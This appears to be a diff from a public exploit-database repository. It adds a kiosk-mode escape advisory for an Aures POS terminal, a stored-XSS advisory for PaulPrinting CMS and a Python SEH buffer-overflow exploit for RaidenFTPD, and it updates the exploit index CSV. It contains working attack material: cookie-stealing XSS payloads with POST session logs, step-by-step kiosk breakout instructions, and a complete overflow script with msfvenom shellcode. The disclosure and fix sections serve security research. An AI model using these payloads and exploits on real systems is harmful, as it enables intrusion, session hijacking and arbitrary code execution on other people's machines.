Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 180
Origin:http://localhost:8080
Connection: keep-alive
Referer:http://localhost:8080/webile_send
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
i={"os":"Windows Windows 10","b":"firefox 102.0","c":">"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}
-
POST: HTTP/1.1 200 OK
Content-Type: application/json
Connection: keep-alive
Content-Encoding: gzip
Transfer-Encoding: chunked
-
http://localhost:8080/evil.source
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer:http://localhost:8080/webile_send
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Content-Type: application/octet-stream
Date: Sun, 17 Jul 2022 18:08:33 GMT
Connection: keep-alive
Content-Length: 0
Security Risk:
==============
The security risk of the persistent web vulnerabilities in the mobile web application is estimated as medium.

185
exploits/php/webapps/51617.txt Normal file
View file

@ -0,0 +1,185 @@
Exploit Title: Aures Booking & POS Terminal - Local Privilege Escalation
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2323
Release Date:
=============
2023-07-17
Vulnerability Laboratory ID (VL-ID):
====================================
2323
Common Vulnerability Scoring System:
====================================
7.2
Vulnerability Class:
====================
Privilege Escalation
Current Estimated Price:
========================
3.000€ - 4.000€
Product & Service Introduction:
===============================
KOMET is an interactive, multifunctional kiosk and specially designed for the fast food industry. Available as a wall-mounted or
freestanding model, its design is especially adapted to foodservice such as take-aways or fast food in system catering. The kiosk
features a 27 YUNO touch system in portrait mode, an ODP 444 thermal receipt printer, a payment terminal and a 2D barcode scanner.
With a click, the customer selects, books, orders, purchases and pays directly at the kiosk. The system offers the possibility to
manage customer cards and promotions. Queue management can also be optimized.
(Copy of the Homepage:https://aures.com/de/komet/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a local kiosk privilege escalation vulnerability in the operating system of
the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh.
Affected Product(s):
====================
Aures Technologies GmbH
Product: Aures Komet Booking & POS Terminal - (KIOSK) (Windows 10 IoT Enterprise)
Vulnerability Disclosure Timeline:
==================================
2023-05-09: Researcher Notification & Coordination (Security Researcher)
2023-07-17: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Authentication Type:
====================
Open Authentication (Anonymous Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A kiosk mode escalation vulnerability has been discovered in the operating system of the Aures Komet Booking & POS Terminal
(Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh. The security vulnerability allows local attackers
to bypass the kiosk mode to compromise the local file system and applications.
It is possible for local attackers to escalate out of the kiosk mode in the aures komet booking & pos terminal. Local attackers are
able to use the touch functionalities in the aures komet booking & pos terminal system to escalate with higher privileges. The security
vulnerability is located in the context menu function of the extended menu on touch interaction. Attackers with restricted low local
privileged access to the booking service front display are able to execute files, can unrestricted download contents or exfiltrate
local file-system information of the compromised windows based operating system.
No keyboard or connections are required to manipulate the service booking and payment terminal. The booking and payment terminal system
vulnerability requires no user user interaction to become exploited and can only be triggered by local physical device access.
Vulnerable Operating System(s):
[+] Windows 10 (IoT Enterprise)
Affected Component(s):
[+] Context Menu
Affected Function(s):
[+] Web Search
[+] Share (Teilen)
Proof of Concept (PoC):
=======================
The local vulnerability can be exploited by local attackers with physical device access without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Sheet
Touch Display => Select Food Item => Highlight Text
=> Open Context Menu => Extend Context Menu => Web-Search
=> Browser => Local File System => Compromised!
Manual steps to reproduce the vulnerability ...
01. First touch the monitor display to move on from standby
02. Select an food item from the menu of immergrün (we recomment the cesar wraps)
03. Push the information button of the selected food item
04. Push twice via touch to mark the selected food item text
05. Press a third time after you have marked the context by holding it down on the touch display
06. Now the function context menu of the operating system for highlighted text appears
07. On the context menu appearing 3 dots to extend the visible function menu
08. Select the web-search or share function for the highlighted content in the context menu
09. The browser of the operating system opens on the main front screen
10.1 By now you are able to download an execute executables using the browser without any blacklisting (Unrestricted Web Access - Download of Files)
10.2 Attackers can open websites on the fron display to manipulate the visible content (Scam & Spam - Web Messages & Web Context)
10.3 Attackers are able to manipulate via browser debugger the web content displayed from immergrün (Phishing - Formular & Banking Information)
10.4 Attackers are able to access the local file system and compromise it by reconfiguration with privileged user account (Local File-System - Privilege Escaltion)
10.5 Attackers are able to infect the local operating system with ransomware or other malicious programs and scripts (Malware - Ransomware, Keylogger, Trojan-Banking & Co.)
10.6 Attackers are able to exfiltrate data from the local computer system using web connecting and available protocols
10.7 Attackers are able to perform man in the middle attacks from the local computer system
11.0 Successful reproduce of the security vulnerability!
Reference(s): Pictures
- 1.png (Terminal A)
- 2.png (Terminal B)
- 3.png (Escape)
- 4.png (Awareness)
Solution - Fix & Patch:
=======================
The security vulnerabilities can be patched by following steps:
1. Disable the content menu to extend
2. Disable the context menu
3. Disable web-search
4. Disable to mark text inputs & texts
5. Disallow to open not white listed websites
6. Disable to download files
7. Restrict the web-browser access
8. Disallow the file browser
9. Disable the browser debug modus
10. Reconfigure the local firewall to allow and disallow connections
11. Change the access permission to prevent exfiltration
Security Risk:
==============
The security risk of the vulnerability in the local booking and payment terminal system is considered high.
The issue can be easily exploited by local attackers with simple interaction via the touch display.
Once compromised, the attackers can fully manipulate the computer's operating system and use it misuse
it for further simple or more complex attack scenarios.
Credits & Authors:
==================
Benjamin Mejri (Kunz) -https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
Lars Guenther -https://www.vulnerability-lab.com/show.php?user=L.+Guenther

257
exploits/php/webapps/51618.txt Normal file
View file

@ -0,0 +1,257 @@
Exploit Title: PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2285
Release Date:
=============
2023-07-19
Vulnerability Laboratory ID (VL-ID):
====================================
2285
Common Vulnerability Scoring System:
====================================
5.8
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface.
(Copy of the Homepage:https://codecanyon.net/user/codepaul )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the PaulPrinting (v2018) cms web-application.
Affected Product(s):
====================
CodePaul
Product: PaulPrinting (2018) - CMS (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2022-08-25: Researcher Notification & Coordination (Security Researcher)
2022-08-26: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (User Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
Multiple persistent input validation vulnerabilities has been discovered in the official PaulPrinting (v2018) cms web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser
to web-application requests from the application-side.
The first vulnerability is located in the register module. Remote attackers are able to register user account with malicious script code.
After the registration to attacker provokes an execution of the malformed scripts on review of the settings or by user reviews of admins
in the backend (listing).
The second vulnerability is located in the delivery module. Remote attackers with low privileged user accounts are able to inject own
malicious script code to contact details. Thus allows to perform an execute on each interaction with users or by reviews of admins in
the backend (listing).
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to
malicious source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] /printing/register
[+] /account/delivery
Vulnerable Input(s):
[+] First name
[+] Last name
[+] Address
[+] City
[+] State
Vulnerable Parameter(s):
[+] firstname
[+] lastname
[+] address
[+] city
[+] state
Affected Module(s):
[+] Frontend Settings (./printing/account/setting)
[+] Frontend Delivery Address (./printing/account/delivery)
[+] Backend User Preview Listing
[+] Backend Delivery Address Contact Review
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Open your browser and start a http session tamper
2. Register in the application by login click to register
3. Inject to the marked vulnerable input fields your test payload
4. Save the entry by submit via post method
5. Login to the account and preview the settings
Note: Administrators in the backend have the same wrong validated context that executes on preview of users
6. The script code executes on preview of the profile - settings
7. Successful reproduce of the first vulnerability!
8. Followup by opening the Delivery address module
9. Add a contact and add in the same vulnerable marked input fields your test payload
Note: T he script code executes on each review of the address in the backend or user frontend
10. Successful reproduce of the second vulnerability!
Exploitation: Payload
"<iframe src=evil.source onload(alert(document.cookie)>
"<iframe src=evil.source onload(alert(document.domain)>
--- PoC Session Logs (POST) ---
https://paulprinting.localhost:8000/printing/account/setting
Host: paulprinting.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 357
Origin:https://paulprinting.localhost:8000
Connection: keep-alive
Referer:https://paulprinting.localhost:8000/printing/account/setting
Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd;
POST:
title=Mr.&firstname=a"<iframe src=evil.source onload(alert(document.cookie)>>
&lastname=b"<iframe src=evil.source onload(alert(document.cookie)>>
&address=c"<iframe src=evil.source onload(alert(document.cookie)>>
&city=d"<iframe src=evil.source onload(alert(document.cookie)>>
&state=e"<iframe src=evil.source onload(alert(document.cookie)>>
&zipcode=2342&country=BS&phone=23523515235235&save=Save
-
POST: HTTP/3.0 302 Found
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.33
location:https://paulprinting.localhost:8000/printing/account/setting?save=1
-
https://paulprinting.localhost:8000/printing/account/setting?save=1
Host: paulprinting.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer:https://paulprinting.localhost:8000/printing/account/setting
Connection: keep-alive
Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd;
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.33
Vulnerable Source: Your Account - Settings
<div class="form-group row">
<label class="col-sm-4 col-form-label">First name</label>
<div class="col-sm-8">
<input type="text" name="firsttname" class="form-control" value="a"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
<label class="col-sm-4 col-form-label">Last name</label>
<div class="col-sm-8">
<input type="text" name="lastname" class="form-control" value="b"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
<div class="form-group row">
<label class="col-sm-4 col-form-label">Address</label>
<div class="col-sm-8">
<input type="text" name="address" class="form-control" value="c"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
<div class="form-group row">
<label class="col-sm-4 col-form-label">City</label>
<div class="col-sm-8">
<input type="text" name="city" class="form-control" value="d"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
<div class="form-group row">
<label class="col-sm-4 col-form-label">State</label>
<div class="col-sm-8">
<input type="text" name="state" class="form-control" value="e"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
Vulnerable Source: Deliery Contact (Address)
<table class="table">
<thead>
<tr>
<th>Contact</th>
<th>Address</th>
<th>City</th>
<th>State</th>
<th>Country</th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td>a"<iframe src=evil.source onload(alert(document.cookie)></td>
<td>b"<iframe src=evil.source onload(alert(document.cookie)></td>
<td>c"<iframe src=evil.source onload(alert(document.cookie)></td>
<td>d"<iframe src=evil.source onload(alert(document.cookie)></td>
<td></td>
<td class="text-right">
<a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10">Edit</a>|
<a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10&delete=1" onclick="return confirm('Delete')">Delete</a>
</td></tr></tbody>
</table>
Security Risk:
==============
The security risk of the cross site scripting web vulnerabilities with persistent attack vector are estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

59
exploits/windows/local/51611.py Executable file
View file

@ -0,0 +1,59 @@
# Exploit Title: RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)
# Date: 18/07/2023
# Exploit Author: Andre Nogueira
# Vendor Homepage: https://www.raidenftpd.com/en/
# Software Link: http://www.raidenmaild.com/download/raidenftpd2.exe
# Version: RaidenFTPD 2.4.4005
# Tested on: Microsoft Windows 10 Build 19045
# 1.- Open RaidenFTPD
# 2.- Click on 'Setup' -> 'Step by step setup wizard'
# 3.- Run python code: exploit-raidenftpd.py
# 4.- Paste the content of exploit-raiden.txt into the field 'Server name'
# 5.- Click 'next' -> 'next' -> 'ok'
# 6.- Pop calc.exe
#!/usr/bin/env python3
from struct import pack
crash = 2000
offset = 497
# msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v shellcode --b "\x00\x0d"
shellcode = b"\x90" * 8
shellcode += b"\xb8\x9c\x78\x14\x60\xd9\xc2\xd9\x74\x24\xf4"
shellcode += b"\x5a\x33\xc9\xb1\x31\x83\xea\xfc\x31\x42\x0f"
shellcode += b"\x03\x42\x93\x9a\xe1\x9c\x43\xd8\x0a\x5d\x93"
shellcode += b"\xbd\x83\xb8\xa2\xfd\xf0\xc9\x94\xcd\x73\x9f"
shellcode += b"\x18\xa5\xd6\x34\xab\xcb\xfe\x3b\x1c\x61\xd9"
shellcode += b"\x72\x9d\xda\x19\x14\x1d\x21\x4e\xf6\x1c\xea"
shellcode += b"\x83\xf7\x59\x17\x69\xa5\x32\x53\xdc\x5a\x37"
shellcode += b"\x29\xdd\xd1\x0b\xbf\x65\x05\xdb\xbe\x44\x98"
shellcode += b"\x50\x99\x46\x1a\xb5\x91\xce\x04\xda\x9c\x99"
shellcode += b"\xbf\x28\x6a\x18\x16\x61\x93\xb7\x57\x4e\x66"
shellcode += b"\xc9\x90\x68\x99\xbc\xe8\x8b\x24\xc7\x2e\xf6"
shellcode += b"\xf2\x42\xb5\x50\x70\xf4\x11\x61\x55\x63\xd1"
shellcode += b"\x6d\x12\xe7\xbd\x71\xa5\x24\xb6\x8d\x2e\xcb"
shellcode += b"\x19\x04\x74\xe8\xbd\x4d\x2e\x91\xe4\x2b\x81"
shellcode += b"\xae\xf7\x94\x7e\x0b\x73\x38\x6a\x26\xde\x56"
shellcode += b"\x6d\xb4\x64\x14\x6d\xc6\x66\x08\x06\xf7\xed"
shellcode += b"\xc7\x51\x08\x24\xac\xae\x42\x65\x84\x26\x0b"
shellcode += b"\xff\x95\x2a\xac\xd5\xd9\x52\x2f\xdc\xa1\xa0"
shellcode += b"\x2f\x95\xa4\xed\xf7\x45\xd4\x7e\x92\x69\x4b"
shellcode += b"\x7e\xb7\x09\x0a\xec\x5b\xe0\xa9\x94\xfe\xfc"
nSEH = b"\xeb\x06\x90\x90" # short jump of 8 bytes
SEH = pack("<L", 0x7c1e76ff) # pop eax; pop esi; ret; => msvcp70.dll
buffer = b"A" * offset
buffer += nSEH
buffer += SEH
buffer += shellcode
buffer += b"D" * (crash -len(buffer))
file_payload = open("exploit-raiden.txt", 'wb')
print("[*] Creating the .txt file for out payload")
file_payload.write(buffer)
print("[*] Writing malicious payload to the .txt file")
file_payload.close()

9
files_exploits.csv
View file

@ -11040,6 +11040,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19686,exploits/multiple/remote/19686.txt,"Microsoft Internet Explorer 4/5/5.5/5.0.1 - external.NavigateAndFind() Cross-Frame",1999-12-22,"Georgi Guninski",remote,multiple,,1999-12-22,2012-07-08,1,CVE-2000-0028;OSVDB-7903,,,,,https://www.securityfocus.com/bid/887/info
19492,exploits/multiple/remote/19492.txt,"Microsoft Internet Explorer 5 / Netscape Communicator 4.0/4.5/4.6 - JavaScript STYLE",1999-09-13,"Georgi Guninski",remote,multiple,,1999-09-13,2012-06-30,1,CVE-1999-0750,,,,,https://www.securityfocus.com/bid/630/info
24189,exploits/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1 / Opera 7.51 - URI Obfuscation",2004-06-10,http-equiv,remote,multiple,,2004-06-10,2013-01-17,1,,,,,,https://www.securityfocus.com/bid/10517/info
51609,exploits/multiple/remote/51609.txt,"Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE.",2023-07-20,nu11secur1ty,remote,multiple,,2023-07-20,2023-07-20,0,CVE-2023-33148,,,,,
51538,exploits/multiple/remote/51538.txt,"Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing",2023-06-22,nu11secur1ty,remote,multiple,,2023-06-22,2023-06-22,0,,,,,,
51574,exploits/multiple/remote/51574.txt,"Microsoft Outlook Microsoft 365 MSO (Version 2306 Build 16.0.16529.20100) 32-bit - Remote Code Execution",2023-07-07,nu11secur1ty,remote,multiple,,2023-07-07,2023-07-07,0,CVE-2023-33131,,,,,
19451,exploits/multiple/remote/19451.txt,"Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP",1999-08-11,L0pth,remote,multiple,,1999-08-11,2012-06-28,1,CVE-1999-0875;OSVDB-1039,,,,,https://www.securityfocus.com/bid/578/info
@ -12106,6 +12107,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49254,exploits/multiple/webapps/49254.txt,"Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
49253,exploits/multiple/webapps/49253.txt,"Rumble Mail Server 0.51.3135 - 'servername' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
49255,exploits/multiple/webapps/49255.txt,"Rumble Mail Server 0.51.3135 - 'username' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
51619,exploits/multiple/webapps/51619.txt,"RWS WorldServer 11.7.3 - Session Token Enumeration",2023-07-20,"RedTeam Pentesting GmbH",webapps,multiple,,2023-07-20,2023-07-20,0,CVE-2023-38357,,,,,
47005,exploits/multiple/webapps/47005.txt,"Sahi pro 7.x/8.x - Directory Traversal",2019-06-18,"Goutham Madhwaraj",webapps,multiple,,2019-06-18,2019-06-18,0,CVE-2018-20470,,,,,
47007,exploits/multiple/webapps/47007.txt,"Sahi pro 8.x - Cross-Site Scripting",2019-06-18,"Goutham Madhwaraj",webapps,multiple,,2019-06-18,2019-07-12,0,CVE-2018-20472,,,,http://www.exploit-db.cominstall_sahi_pro_v800_20181031.jar,
47062,exploits/multiple/webapps/47062.py,"Sahi pro 8.x - Directory Traversal",2019-07-01,Operat0r,webapps,multiple,,2019-07-01,2020-03-09,0,CVE-2019-13063,Traversal,,,http://www.exploit-db.cominstall_sahi_pro_v800_20181031.jar,
@ -14282,6 +14284,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
5319,exploits/php/webapps/5319.pl,"AuraCMS 2.x - '/user.php' Security Code Bypass / Arbitrary Add Administrator",2008-03-28,NTOS-Team,webapps,php,,2008-03-27,2016-10-26,1,OSVDB-43963;CVE-2008-1715,,,,,
33555,exploits/php/webapps/33555.txt,"AuraCMS 3.0 - Multiple Vulnerabilities",2014-05-28,"Mustafa ALTINKAYNAK",webapps,php,,2014-05-28,2014-05-31,1,OSVDB-107554;CVE-2014-3974;CVE-2014-3975,,,http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-05-31-at-151915.png,http://www.exploit-db.comAuraCMS.zip,
4254,exploits/php/webapps/4254.txt,"AuraCMS Forum Module - SQL Injection",2007-08-05,k1tk4t,webapps,php,,2007-08-04,,1,OSVDB-36432;CVE-2007-4171,,,,,
51617,exploits/php/webapps/51617.txt,"Aures Booking & POS Terminal - Local Privilege Escalation",2023-07-20,Vulnerability-Lab,webapps,php,,2023-07-20,2023-07-20,0,,,,,,
10609,exploits/php/webapps/10609.txt,"Aurora CMS - SQL Injection",2009-12-22,Sora,webapps,php,,2009-12-21,,0,,,,,,
9656,exploits/php/webapps/9656.txt,"Aurora CMS 1.0.2 - 'install.plugin.php' Remote File Inclusion",2009-09-14,"EA Ngel",webapps,php,,2009-09-13,,1,OSVDB-58124;CVE-2009-3365,,,,,
12155,exploits/php/webapps/12155.txt,"AuroraGPT 4.0 - Remote Code Execution",2010-04-11,"Amoo Arash",webapps,php,,2010-04-10,,0,,,,,,
@ -15013,6 +15016,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
25735,exploits/php/webapps/25735.txt,"BookReview 1.0 - 'suggest_review.htm?node' Cross-Site Scripting",2005-05-26,Lostmon,webapps,php,,2005-05-26,2013-05-27,1,CVE-2005-1782;OSVDB-16879,,,,,https://www.securityfocus.com/bid/13783/info
11402,exploits/php/webapps/11402.txt,"Books/eBooks Rental Software - SQL Injection",2010-02-11,"Don Tukulesto",webapps,php,,2010-02-10,,1,OSVDB-62277;CVE-2010-0761,,,,,
17943,exploits/php/webapps/17943.txt,"BOOKSolved 1.2.2 - Remote File Disclosure",2011-10-08,bd0rk,webapps,php,,2011-10-08,2011-10-08,0,OSVDB-83480,,,,http://www.exploit-db.combooksolved_v1.2.2.zip,
51612,exploits/php/webapps/51612.txt,"Boom CMS v8.0.7 - Cross Site Scripting",2023-07-20,Vulnerability-Lab,webapps,php,,2023-07-20,2023-07-20,0,,,,,,
29097,exploits/php/webapps/29097.txt,"Boonex 2.0 Dolphin - 'index.php' Remote File Inclusion",2006-11-20,S.W.A.T.,webapps,php,,2006-11-20,2013-10-21,1,,,,,,https://www.securityfocus.com/bid/21182/info
2575,exploits/php/webapps/2575.php,"Boonex Dolphin 5.2 - 'index.php' Remote Code Execution",2006-10-16,w4ck1ng,webapps,php,,2006-10-15,,1,,,,,,
36244,exploits/php/webapps/36244.txt,"Boonex Dolphin 6.1 - 'get_list.php' SQL Injection",2011-10-19,"Yuri Goltsev",webapps,php,,2011-10-19,2016-12-13,1,,,,,,https://www.securityfocus.com/bid/50286/info
@ -25517,6 +25521,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50264,exploits/php/webapps/50264.py,"Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload",2021-09-06,a-rey,webapps,php,,2021-09-06,2021-10-22,0,,,,,,
27634,exploits/php/webapps/27634.txt,"PatroNet CMS - 'index.php' Cross-Site Scripting",2006-04-12,Soothackers,webapps,php,,2006-04-12,2013-08-17,1,CVE-2006-1783;OSVDB-31440,,,,,https://www.securityfocus.com/bid/17495/info
44746,exploits/php/webapps/44746.txt,"PaulNews 1.0 - 'keyword' SQL Injection / Cross-Site Scripting",2018-05-24,AkkuS,webapps,php,,2018-05-24,2018-05-24,0,,,,,,
51618,exploits/php/webapps/51618.txt,"PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities",2023-07-20,Vulnerability-Lab,webapps,php,,2023-07-20,2023-07-20,0,,,,,,
44689,exploits/php/webapps/44689.txt,"PaulPrinting CMS Printing 1.0 - SQL Injection",2018-05-22,"Mehmet Onder",webapps,php,,2018-05-22,2018-05-22,0,,,,,,
42156,exploits/php/webapps/42156.txt,"PaulShop - SQL Injection",2017-06-10,Se0pHpHack3r,webapps,php,,2017-06-11,2017-06-11,0,,,,,,
42359,exploits/php/webapps/42359.txt,"PaulShop - SQL Injection / Cross-Site Scripting",2017-07-24,"BTIS Team",webapps,php,,2017-07-24,2017-07-24,0,,,,,,
@ -25639,6 +25644,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
39709,exploits/php/webapps/39709.txt,"pfSense Community Edition 2.2.6 - Multiple Vulnerabilities",2016-04-18,Security-Assessment.com,webapps,php,443,2016-04-18,2016-04-18,0,,,,,http://www.exploit-db.compfSense-LiveCD-2.2.6-RELEASE-i386.iso.gz,http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf
39306,exploits/php/webapps/39306.html,"pfSense Firewall 2.2.5 - Config File Cross-Site Request Forgery",2016-01-25,"Aatif Shahdad",webapps,php,443,2016-01-25,2016-04-14,0,OSVDB-132268,,,,http://www.exploit-db.compfsense-RELENG_2_2_5.tar.gz,
39695,exploits/php/webapps/39695.txt,"pfSense Firewall 2.2.6 - Services Cross-Site Request Forgery",2016-04-14,"Aatif Shahdad",webapps,php,443,2016-04-14,2016-04-14,0,,,,,http://www.exploit-db.compfSense-LiveCD-2.2.5-RELEASE-i386.iso.gz,
51608,exploits/php/webapps/51608.rb,"pfSense v2.7.0 - OS Command Injection",2023-07-20,"Emir Polat",webapps,php,,2023-07-20,2023-07-20,0,CVE-2023-27253,,,,,
43090,exploits/php/webapps/43090.txt,"PG All Share Video 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,,2017-10-30,2017-10-30,0,CVE-2017-15969,,,,,
22373,exploits/php/webapps/22373.txt,"PG Dating Pro CMS 1.0 - Multiple Vulnerabilities",2012-10-31,Vulnerability-Lab,webapps,php,,2012-10-31,2012-10-31,0,OSVDB-86857;OSVDB-86856;OSVDB-86855,,,,,https://www.vulnerability-lab.com/get_content.php?id=736
17531,exploits/php/webapps/17531.txt,"PG eLms Pro vDEC_2007_01 - 'contact_us.php' Multiple POST Cross-Site Scripting Vulnerabilities",2011-07-14,LiquidWorm,webapps,php,,2011-07-14,2011-07-14,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5027.php
@ -32129,6 +32135,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
21269,exploits/php/webapps/21269.txt,"Webify eDownloads Cart - Arbitrary File Deletion",2012-09-12,JIKO,webapps,php,,2012-09-12,2012-09-12,0,OSVDB-85662,,,,,
19574,exploits/php/webapps/19574.txt,"Webify Link Directory - SQL Injection",2012-07-04,"Daniel Godoy",webapps,php,,2012-07-04,2012-07-04,1,OSVDB-83688,,,,http://www.exploit-db.comWebifyLinkDirectory.zip,
21271,exploits/php/webapps/21271.txt,"Webify Photo Gallery - Arbitrary File Deletion",2012-09-12,JIKO,webapps,php,,2012-09-12,2012-09-12,1,OSVDB-85662,,,,,
51616,exploits/php/webapps/51616.txt,"Webile v1.0.1 - Multiple Cross Site Scripting",2023-07-20,Vulnerability-Lab,webapps,php,,2023-07-20,2023-07-20,0,,,,,,
47199,exploits/php/webapps/47199.txt,"WebIncorp ERP - SQL injection",2019-08-01,n1x_,webapps,php,80,2019-08-01,2019-08-02,0,,"SQL Injection (SQLi)",,,,
46350,exploits/php/webapps/46350.txt,"Webiness Inventory 2.3 - 'email' SQL Injection",2019-02-11,"Mehmet EMIROGLU",webapps,php,80,2019-02-11,2019-02-12,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comwebiness_inventory-2.3.zip,
45843,exploits/php/webapps/45843.txt,"Webiness Inventory 2.3 - 'order' SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80,2018-11-13,2019-02-15,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comwebiness_inventory-2.3.zip,
@ -32328,6 +32335,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
34890,exploits/php/webapps/34890.txt,"Wiccle Web Builder 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-10-21,"Veerendra G.G",webapps,php,,2010-10-21,2014-10-06,1,,,,,,https://www.securityfocus.com/bid/44295/info
2624,exploits/php/webapps/2624.txt,"WiClear 0.10 - 'path' Remote File Inclusion",2006-10-23,"the master",webapps,php,,2006-10-22,2016-09-14,1,OSVDB-29949;CVE-2006-5506;OSVDB-29948;OSVDB-29947;OSVDB-29946;OSVDB-29945;OSVDB-29944;OSVDB-29943;OSVDB-29942,,,,http://www.exploit-db.comwiclear-0.10.tgz,
26715,exploits/php/webapps/26715.txt,"Widget Property 1.1.19 - 'Property.php' SQL Injection",2005-11-05,r0t3d3Vil,webapps,php,,2005-11-05,2013-07-09,1,CVE-2005-4016;OSVDB-21426,,,,,https://www.securityfocus.com/bid/15701/info
51610,exploits/php/webapps/51610.txt,"Wifi Soft Unibox Administration 3.0 & 3.1 - SQL Injection",2023-07-20,"Ansh Jain",webapps,php,,2023-07-20,2023-07-20,0,CVE-2023-34635,,,,,
22282,exploits/php/webapps/22282.txt,"WihPhoto 0.86 dev - 'sendphoto.php' File Disclosure",2003-02-24,frog,webapps,php,,2003-02-24,2012-10-28,1,CVE-2003-1239;OSVDB-53611,,,,,https://www.securityfocus.com/bid/6929/info
2252,exploits/php/webapps/2252.pl,"Wikepage Opus 10 < 2006.2a (lng) - Remote Command Execution",2006-08-24,Hessam-x,webapps,php,,2006-08-23,2016-09-09,1,OSVDB-28177;CVE-2006-4418,,,,http://www.exploit-db.comwikepage2006_2a.zip,
31623,exploits/php/webapps/31623.txt,"Wikepage Opus 13 2007.2 - 'index.php' Multiple Directory Traversal Vulnerabilities",2008-04-07,A.nosrati,webapps,php,,2008-04-07,2014-02-12,1,,,,,,https://www.securityfocus.com/bid/28664/info
